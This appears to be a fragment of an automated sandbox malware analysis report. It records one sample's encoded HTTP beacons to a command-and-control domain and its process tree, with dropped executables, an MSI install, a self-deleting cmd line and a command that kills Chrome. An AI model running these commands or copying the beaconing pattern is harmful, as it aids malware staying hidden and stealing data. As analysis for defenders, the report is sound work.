                                                                                                                                                  cf-request-id: 06d374978500004120da910000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tw3sB28BceV52SsEyjr%2BhBHIHnnD2mTSvqzz3DG3rdDxEWSgO7egRAh3pKqjgZAvPzHV3a9KCUGlanchXyiHlPi8drdtLRm3ztuHjDSDBSl6sekExg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc239f3b904120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.349740104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:43:28.448842049 CET4275OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:28.448959112 CET4275OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 66 43 34 4d 6d 78 65 6f 75 42 36 37 4e 53 55 63 6d 52 79 30 63 6c 52 4a
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwfC4MmxeouB67NSUcmRy0clRJIN3FaDyew~~
                                                                                                                                                  Dec 5, 2020 08:43:32.399786949 CET4277INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:32 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dbda57ca824670aeb15962b7f96e3302a1607154208; expires=Mon, 04-Jan-21 07:43:28 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37426d0000027bc0b12b000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TbvyRibHa2c3bNnK1im0hqyUzcf03R79kf4PqGuyPXplybVNb8gS97Px9aT%2FdeUN%2BfWXd%2FHImfvbX6HvaVmDXmoCakq6BpmJQU66OqBtKbhpRVK0vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc22eae9d227bc-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.349741104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:43:33.103669882 CET4278OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:33.103720903 CET4278OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 59 6b 57 34 56 30 67 78 67 4b 50 55 77 46 67 67 56 54 68 63 4f 77 7e
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwYkW4V0gxgKPUwFggVThcOw~
                                                                                                                                                  Dec 5, 2020 08:43:36.861763954 CET4280INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:36 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d6ab65dbae494ae6d92ea824b1843e9691607154213; expires=Mon, 04-Jan-21 07:43:33 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37438fb0000412c93a51000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=IgDBf%2B5RvUoWP105LTZAwqQGdaWeiQSee%2BwvYyovuy4XJvAihBlpA0moSin89G5pWrLlT1KuOsDIEYrCu9ofQnegXZYtj1j9EM3vy6kxyWZFjTzvKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2307f93c412c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:40.024529934 CET4341OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:40.024590969 CET4341OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 59 6b 57 34 56 30 67 78 67 4b 50 46 37 75 66 38 34 70 42 66 41 73 7e
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwYkW4V0gxgKPF7uf84pBfAs~
                                                                                                                                                  Dec 5, 2020 08:43:43.565794945 CET4848INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:43 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d0e507f4c0f150e265543a4b9cde0694c1607154220; expires=Mon, 04-Jan-21 07:43:40 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37454040000412cf40b5000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YgtztI7FjnIJJzB9ajN28lFuCQiHi8rQ2P8v6WX9Xp1NJWFmd7%2FbIWO%2FwtLlyLLGQsKyzIWjO1vvyqkBe6%2FbAQmeD%2FY3i0WeIGgXqNGso6rQlS0YQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc23333db7412c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  4192.168.2.349749104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:43:43.650659084 CET4849OUTGET /info/ddd HTTP/1.1
                                                                                                                                                  Host: EF6DF4AF06BA6896.xyz
                                                                                                                                                  Accept: */*
                                                                                                                                                  Dec 5, 2020 08:43:44.997695923 CET5053INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:44 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=de632e683c144605b22411be5233876341607154223; expires=Mon, 04-Jan-21 07:43:43 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d374622e0000278cd63bb000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MON8MExJN870FwT45Tf%2B5uHZ0HmE9BKb2%2FpyIiL277bSvhUNGRlXMqeIEPbRzspy2LsUVqoWFLoWSmu7HRg91Yo3Bt2aqALo3HWSZNtrj73HUtJEnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2349ebdd278c-PRG
                                                                                                                                                  Data Raw: 32 32 63 0d 0a 78 68 75 70 66 71 73 6d 67 6e 58 47 55 33 71 74 2d 69 59 44 75 70 33 44 69 42 46 51 4a 6f 63 62 56 5f 71 5f 4e 48 30 38 74 53 4a 39 61 34 41 42 67 76 46 68 4b 7a 58 35 76 6c 72 72 65 4f 30 7a 38 56 6b 34 64 6f 47 38 59 6d 43 30 4e 4f 5f 57 67 36 49 78 48 70 49 48 4f 4a 6f 6b 71 6a 4d 4b 51 54 34 6f 5f 76 39 59 78 54 57 79 56 6e 6f 77 37 56 54 59 4d 68 4f 74 71 6f 38 43 58 37 67 6a 51 77 30 70 59 38 62 52 39 33 59 39 57 71 68 31 4f 2d 76 79 36 4c 4a 49 45 4f 4e 74 6d 57 66 58 62 62 55 76 6d 68 49 68 56 47 71 52 6b 72 62 78 36 36 32 71 4a 5f 30 4b 50 53 67 4c 79 38 49 74 67 5a 77 58 75 38 49 33 42 6e 7a 64 30 6f 70 4a 30 4b 51 31 35 57 74 51 49 6a 56 6e 6a 48 71 66 33 43 64 42 59 53 4c 77 4e 76 37 54 43 68 6d 6c 48 69 50 6e 54 65 6a 48 72 43 34 4e 42 70 6e 30 57 6a 79 56 41 37 7a 68 43 34 51 33 65 76 41 74 32 73 6a 42 35 71 65 48 75 4a 6c 48 61 63 61 38 38 72 36 78 5a 43 61 4a 32 66 6d 33 65 70 77 41 42 47 68 49 51 6e 76 76 48 70 31 42 6e 73 53 79 6f 79 45 41 49 55 6e 50 59 6f 56 33 66 32 39 32 56 55 6a 6d 65 79 73 7a 63 72 74 36 39 32 45 35 6f 44 7a 37 63 41 64 6d 41 5a 70 74 6d 69 4b 54 56 31 77 51 42 55 66 53 34 43 6f 64 37 70 4e 4f 76 4a 4c 62 45 36 5f 56 47 6c 44 75 41 45 53 4c 6e 6f 62 36 75 48 41 31 74 6b 65 6d 75 2d 61 79 68 6d 46 32 46 6a 7a 44 4d 59 76 47 30 46 30 43 5a 58 76 78 35 67 76 6a 6a 52 59 47 6c 59 36 70 74 36 6d 46 6f 67 64 31 69 64 67 6c 4b 54 66 69 5a 71 58 63 69 61 38 54 39 39 68 50 62 62 68 77 52 4a 70 71 63 49 31 51 55 6a 66 4b 55 51 2d 4c 73 5a 62 46 6c 52 46 6d 66 4a 6f 4e 52 78 6d 4c 55 6d 67 4f 45 4e 68 6d 4c 37 69 4e 78 7a 55 46 62 55 61 79 46 36 54 53 47 52 36 66 64 66 74 41 52 72 41 74 70 5a 32 46 62 6a 38 7e 0d 0a
                                                                                                                                                  Data Ascii: 22cxhupfqsmgnXGU3qt-iYDup3DiBFQJocbV_q_NH08tSJ9a4ABgvFhKzX5vlrreO0z8Vk4doG8YmC0NO_Wg6IxHpIHOJokqjMKQT4o_v9YxTWyVnow7VTYMhOtqo8CX7gjQw0pY8bR93Y9Wqh1O-vy6LJIEONtmWfXbbUvmhIhVGqRkrbx662qJ_0KPSgLy8ItgZwXu8I3Bnzd0opJ0KQ15WtQIjVnjHqf3CdBYSLwNv7TChmlHiPnTejHrC4NBpn0WjyVA7zhC4Q3evAt2sjB5qeHuJlHaca88r6xZCaJ2fm3epwABGhIQnvvHp1BnsSyoyEAIUnPYoV3f292VUjmeyszcrt692E5oDz7cAdmAZptmiKTV1wQBUfS4Cod7pNOvJLbE6_VGlDuAESLnob6uHA1tkemu-ayhmF2FjzDMYvG0F0CZXvx5gvjjRYGlY6pt6mFogd1idglKTfiZqXcia8T99hPbbhwRJpqcI1QUjfKUQ-LsZbFlRFmfJoNRxmLUmgOENhmL7iNxzUFbUayF6TSGR6fdftARrAtpZ2Fbj8~
                                                                                                                                                  Dec 5, 2020 08:43:44.997734070 CET5053INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  HTTPS Packets

                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                  Dec 5, 2020 08:43:12.476727009 CET172.67.142.39443192.168.2.349739CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Sep 24 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Sep 24 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: h1GodtbhC8.exe PID: 5356 Parent PID: 5672

                                                                                                                                                  General

                                                                                                                                                  Start time:08:40:22
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\Desktop\h1GodtbhC8.exe'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:4671378 bytes
                                                                                                                                                  MD5 hash:3CA6DF4914385EFD4BA9CD239B5ED254
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: setup.exe PID: 2172 Parent PID: 5356

                                                                                                                                                  General

                                                                                                                                                  Start time:08:40:23
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
                                                                                                                                                  Imagebase:0x1210000
                                                                                                                                                  File size:4387715 bytes
                                                                                                                                                  MD5 hash:69C9BA53239D6838D05594D96A36DEA3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: aliens.exe PID: 2992 Parent PID: 2172

                                                                                                                                                  General

                                                                                                                                                  Start time:08:41:29
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\71eza90awf48\aliens.exe'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:506545472 bytes
                                                                                                                                                  MD5 hash:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: msiexec.exe PID: 1752 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:41:52
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                  Imagebase:0x1180000
                                                                                                                                                  File size:59904 bytes
                                                                                                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: msiexec.exe PID: 772 Parent PID: 1564

                                                                                                                                                  General

                                                                                                                                                  Start time:08:41:54
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
                                                                                                                                                  Imagebase:0x1180000
                                                                                                                                                  File size:59904 bytes
                                                                                                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: 1E1C360C582DF797.exe PID: 6300 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:42:43
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:506545472 bytes
                                                                                                                                                  MD5 hash:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: 1E1C360C582DF797.exe PID: 3180 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:27
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:506545472 bytes
                                                                                                                                                  MD5 hash:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: 1607186572092.exe PID: 2116 Parent PID: 6300

                                                                                                                                                  General

                                                                                                                                                  Start time:08:42:52
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:103632 bytes
                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: 1607186588295.exe PID: 6636 Parent PID: 6300

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:08
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:103632 bytes
                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: cmd.exe PID: 5728 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: conhost.exe PID: 5724 Parent PID: 5728

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: PING.EXE PID: 4948 Parent PID: 5728

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                  File size:18944 bytes
                                                                                                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: ThunderFW.exe PID: 7040 Parent PID: 6300

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:35
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:73160 bytes
                                                                                                                                                  MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: cmd.exe PID: 2416 Parent PID: 3180

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:37
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: conhost.exe PID: 5364 Parent PID: 2416

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:38
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

